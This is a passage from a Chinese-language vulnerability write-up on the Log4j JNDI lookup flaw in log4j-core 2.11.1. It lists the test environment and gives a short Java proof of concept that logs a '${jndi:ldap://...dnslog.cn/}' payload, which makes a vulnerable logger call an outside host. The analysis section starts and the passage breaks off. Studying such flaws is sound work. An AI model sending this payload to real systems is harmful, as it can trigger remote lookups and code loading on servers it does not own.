零基础学黑客,搜索公众号:白帽子左一
作者:掌控安全——holic
0x01、环境
Jdk7u21(随便版本都可以)
影响版本:
Apache Log4j 2.x
org.apache.logging.log4j
log4j-core
2.11.1
Poc
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class test2 {
private static Logger LOGGER = LogManager.getLogger();
public static void main(String[] args) {
LOGGER.error("${jndi:ldap://ewa04i.dnslog.cn/}");
}
}
0x02、分析
看payload,我们无可厚非去搜索log4j lookup或者log4j jndi